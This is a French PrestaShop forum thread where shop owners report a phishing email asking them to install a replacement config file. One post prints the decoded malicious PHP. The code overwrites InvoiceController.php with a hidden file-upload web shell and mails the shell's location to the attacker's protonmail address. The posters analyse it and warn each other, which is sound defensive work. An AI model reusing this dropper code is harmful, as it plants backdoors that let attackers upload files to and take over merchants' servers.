Jump to content
Zouichi

Tentative de piratage

Recommended Posts

Bonjour,

j'ai reçu le mail suivant ce matin, venant d'une adresse non officielle, avec un fichier de config à télécharger et changer sur mon serveur.

Je ne sais pas si l'équipe Prestashop peut agir dessus, mais au moins vous êtes au courant ;)

tentative-piratage.png.b8dca3411ab36afbd91c8b3c866da689.png

Zouichi

Malheureusement, PrestaShop ne peut rien faire.

Hello,

J'ai reçu le même email.

Voici le code malveillant décrypté:

fwrite(fopen("controllers/front/InvoiceController.php","w+"),'<?php if(isset($_GET["hahahaha"])){echo"<center><font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo"<br><font color=#FFFFFF>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Success</b>-->".$_FILES["f"]["name"];}else{echo"<b>Failed";}}}');
$to = "cestdanslaboite@protonmail.com";
$subject = "HAHAHAHA GROSSE MERDE -> " . $_SERVER['SERVER_NAME'];
$header = "from: CDLB <cestdanslaboite@ms.sk>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."\r\n";
$message .= "Path : " . __file__ . " (/controllers/front/InvoiceController.php?hahahaha)";
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

Ce code modifie votre fichier controllers/front/InvoiceController.php en y ajoutant un formulaire pour uploader des fichiers sur votre serveur.

On peut identifier deux emails: cestdanslaboite@ms.sk qui ne sert à rien mais cestdanslaboite@protonmail.com qui est l'email finale.

On notera également le titre du mail HAHAHHAHA GROSSE MERDE...

Capture d’écran 2020-05-06 à 09.24.20.png

Capture d’écran 2020-05-06 à 09.38.43.png

Au moins ils ont de l'humour ;)

je ne l'ai pas reçu mais l'un de vous 2 pourrait il "afficher le message en texte brut" ou ""afficher la source" ou "afficher le code source" dans sa boite mail histoire d'avoir plus de données ?

il est clair qu'aucune entreprise digne de ce nom n'enverra un mail aussi important de cette manière

39 minutes ago, coeos.pro said:

je ne l'ai pas reçu mais l'un de vous 2 pourrait il "afficher le message en texte brut" ou ""afficher la source" ou "afficher le code source" dans sa boite mail histoire d'avoir plus de données ?

il est clair qu'aucune entreprise digne de ce nom n'enverra un mail aussi important de cette manière

Envoyé en MP

Bonjour,

Je l'ai reçu aussi ce matin ! l'expéditeur est : prestadev@webclienginer.com

sujet : [IMPORTANT] Mise à jour d'un fichier de configuration de notre CMS

Fichier joint : config.inc.php

j'ai supprimé le mail ....